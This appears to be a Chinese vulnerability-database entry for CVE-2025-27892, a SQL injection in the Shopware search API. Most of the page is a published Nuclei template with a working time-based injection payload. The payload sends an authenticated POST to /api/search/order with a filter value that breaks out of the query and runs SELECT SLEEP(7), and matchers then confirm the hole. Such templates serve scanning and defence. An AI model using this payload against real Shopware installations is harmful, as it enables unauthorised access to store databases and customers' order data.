CVE-2025-27892: Shopware < 6.5.8.13 - SQL Injection

日期: 2025-08-01 | 影响软件: Shopware | POC: 已公开

漏洞描述

The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The name field in this "aggregations" in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.

PoC代码[已公开]

id: CVE-2025-27892

info:
  name: Shopware < 6.5.8.13 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The name field in this "aggregations" in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.
  reference:
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27892
  classification:
    epss-score: 0.01496
    epss-percentile: 0.80456
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 6.8
    cve-id: CVE-2025-27892
    cwe-id: CWE-89
  metadata:
    max-request: 1
    vendor: shopware
    product: shopware
    verified: true
  tags: cve,cve2025,shopware,sqli,time-based-sqli

variables:
  token: "{{token}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /api/search/order HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
        Accept: */*
        Authorization: Bearer {{token}}
        Content-type: application/json

        {
          "filter": [
            {
              "type": "equals",
              "field": "transactions.stateMachineState.technicalName",
              "value": "paid` FROM `order`; SELECT SLEEP(7); -- "
            }
          ],
          "aggregations": [
            {
              "type": "histogram",
              "name": "order_sum_bucket",
              "field": "orderDateTime",
              "interval": "day",
              "aggregation": {
                "type": "sum",
                "name": "totalAmount ? ? --",
                "field": "amountTotal"
              }
            }
          ]
        }


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Warning: Undefined array")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 500'
          - 'duration>=5'
        condition: and
# digest: 4b0a00483046022100f8c7e896bb2d76b2821e60025d889a5145cc24e4ae523d01f7c08a5e699b691702210095f2457fc437630c8a0f97403978df83d91ce5a93224c86f368c53b4404a2057:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-27892.yaml

相关漏洞推荐